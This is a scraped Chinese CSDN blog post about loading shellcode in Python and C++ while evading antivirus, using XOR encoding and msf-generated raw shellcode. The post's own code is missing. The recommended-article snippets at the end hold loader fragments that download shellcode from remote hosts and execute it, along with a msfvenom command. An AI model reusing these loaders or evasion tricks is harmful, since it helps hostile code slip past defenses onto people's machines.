python 执行shellcode_各种语言实现Shellcode加载(暂时两种)

最新推荐文章于 2024-06-02 19:43:12 发布
最新推荐文章于 2024-06-02 19:43:12 发布
阅读量691 收藏
点赞数
文章标签: python 执行shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39612817/article/details/113495786
版权

原理:使用Shellcode和加载器分离的方法,方法很low,但是值得尝试

Python

参考自K8

Shellcode混合加密

造轮子,造轮子QAQ(K8师傅的那个已经过不了检测了)

编译

用法的话则是

结果如下

虽然VT检出率挺高的但是过360还是可以的

估计动态免杀是过不了的

参考资料

C/C++语言实现Shellcode

加载Shellcode的代码

C++这些东西还是不太懂得,大约就是申请虚拟内存,将shellcode拷贝进去,再将exec指针转换为函数指针并且执行(我的c++确实不太行,有大佬知道的请务必告诉我)

当然你还可以用命令行实现,使用argv参数来达到命令行读取的效果

执行netstat -ano可以看见我们监听的端口

但是因为shellcode本身的特征比较明显,杀毒软件很容易定位到

异或编码绕过

先使用msf制造raw格式的shellcode文件

使用python3 xxx.py -s 1.raw -d 1.txt -n 44

就会在1.txt生成与44异或的shellcode

放进里面试试

免杀360了,确实很简单,如果可以的话还可以做成像Python那样的多种加密的形式

扩展

还可以利用Socket来动态加载Shellcode,这种方式更加隐蔽(代码功底不是很好emmmm)

参考资料

总结

静态免杀很容易,难的是动态,难的是持久

weixin_39612817
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python 申请内存_python内存分配
weixin_39538847的博客
11-29 2465
广告关闭腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务首年88元起,买的越多返的越多,最高返5000元!python 中的sys模块极为基础而重要,它主要提供了一些给解释使用(或由它维护)的变量,以及一些与解释强交互的函数。 本文将会频繁地使用该模块的getsizeof()方法,因此,我先简要介绍一下:该方法用于获取一个对象的字节大小(bytes)它只计算直接占用的内存,而不计算对...
Shellcode
weixin_43916678的博客
07-07 8970
shellcode简介 shellcode是一段用于利用软件漏洞而执行的代码,也可以认为是一段填充数据,shellcode为16进制的机码,因为经常让攻击者获得shell而得名。shellcode常常使用机语言编写。 可在暂存eip溢出后,塞入一段可让CPU执行shellcode码,让电脑可以执行攻击者的任意指令。 下面这张图就是shellcode工作流程,从功能上看,shellcode在整个漏洞利用过程中发挥主要作用就是对计算机端的控制。 shellcode可以按照攻击者执行的位置分为本地s
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1363
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机码,因为经常让攻击者获得shell而得名。shellcode常常使用机语言编写。可在暂存eip溢出后,塞入一段可让CPU执行shellcode码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
NimShellCodeLoader:使用nim编写的shellcode加载
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
python加载shellcode免杀
qq_47289634的博客
06-02 225
以上涉及的代码可以使用Python打包成exe,然后再在Windows系统中执行。这段代码有很多优点,代码里面注释很清楚,每一步都有详细的解释,可随意扩展自己的思路。这两个不管使用哪一个,在PyCharm中运行这段代码都会,上线到CS。下面将介绍1种从远程服务加载share code进行上线的方法。复制编码后的结果,保存为1.txt,并把它放到自己的服务上。上面的代码没有做任何防护,很容易就被杀毒软件识别出来。把1.txt的地址放到下面代码里面,之后运行这段代码。运行之后,依旧可以直接上线CS。
学习笔记1:python实现shellcode加载
nglj9527的博客
01-02 5827
python实现shellcode加载名词解释代码 名词解释 shellcode:一段可以由电脑直接执行的机码,执行后可以搭建起stranger。 加载:将shellcode加载进内存,并开始执行的程序。 代码 import ctypes import base64 import requests shellcode = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\
python生成shellcode加载(免杀,可过杀软)
u010508029的博客
05-31 3785
import ctypes, cPickle, base64, urllib2 class ptr(object): def __reduce__(self): return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64 class buf(object): def __init__(self, shellcode): sel.
免杀方法(四)Python免杀shellcode加载
qq_56426046的博客
10-03 1230
免杀方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES将python代码缩小并混淆最后生成exe目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等。
python-shellcode加载初体验
Y4tacker的博客
03-28 2141
@Author:Y4tacker 文章目录python-shellcode加载流程函数介绍VirtualAllocRtlMoveMemoryCreateThreadWaitForSingleObject实战 python-shellcode加载 主要是利用ctypes库来调用windows的api来完成加载shellcode的操作 流程 将shellcode加载进内存并执行 函数介绍 VirtualAlloc 申请内存调用VirtualAlloc函数,来申请一块动态内存区域。VirtualAlloc函数
最新免杀360,基于shellcode字符混淆
最新发布
06-22
- 加载机制:采用特殊的加载来处理变形的Shellcode,并在内存中正确设置和执行。 #### 实现示例 下面是一个使用Python进行简单异或混淆的例子: ```python import struct # 原始Shellcode shellcode = b"\x31...
cpp-在恶意软件分析过程中快速调试shellcode
08-15
Shellcode通常是一种用机码编写的代码片段,它被设计为在内存中执行,绕过安全机制。掌握如何有效地调试shellcode可以帮助安全分析师理解恶意软件的行为,发现潜在的漏洞,并阻止攻击。 1. **调试基础知识**: ...
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1196
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
Python实现免杀Shellcode加载编写
m0_56187372的博客
12-11 1030
利用python实现免杀shellcode加载的编写
python加载shellcode免杀 简介
whatday的专栏
10-02 4731
前言 本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从免杀小白到免杀入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf。本人也是刚接触免杀,若有说得不对的地方,欢迎大佬们及时提出指正。关于本人在实验过程中所踩的一些坑会在文中提醒大家,让大家尽量少入坑。 注:以下实验截图均为本人发稿时重新测试所截 0X00 基础概念 1. python ctypes模块介绍 ctypes是 Python的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 D...
Python 执行 shellcode
weixin_30298497的博客
04-11 1066
import urllib2 import ctypes import base64 # 从我们的web服务上下载shellcode url = "http://rinige.com/shellcode.bin" response = urllib2.urlopen(url) # base64 解码 shellcode shellcode = base64.b64de...
利用Python执行ShellCode
2201_75774378的博客
05-05 606
D:\网安\sike\ShellCode_Loader>Shellcode_encryption.exe shellcode_xor.c。将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = ‘密文Shellcode’ 处。运行:Shellcode_encryption.exe payload.c 对ShellCode代码进行加密处理。使用Python 64位版加载。生成x64位的ShellCode。使用64位版Python加载Python加载实现免杀。
python执行shellcode_python exec shellcode
weixin_39620653的博客
12-03 597
前言这里我先吐槽一下,网上用中文搜的python执行shellcode。全部是复制粘贴,棒的我不知道如何下手然后今天早上@即刻安全-Yansu老哥帮我整出来了。老板喝茶正文代码我理解不了多少,可能还有错的获取shellcodemsfvenom -p windows/x64/exec CMD=calc.exe -f py -o /root/demo.py执行shellcode代码如下import c...
Python exe2shellcodeshellcode2exe
weixin_30649859的博客
04-08 201
exe2shellcode #! /usr/bin/env python # -*- coding: utf-8 -*- import os import sys def payload(files): shellcode = "" ctr = 1 maxlen = 15 #to create rows try: fo...
python制作shellcode加载
08-08
制作 Shellcode 加载的方法有很多,这里介绍一种基于 Python实现方法。 首先,我们需要编写一个能够执行 shellcode 的程序。这个程序可以使用 C 语言编写,也可以使用其他语言编写。下面是一个简单的 C 语言...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值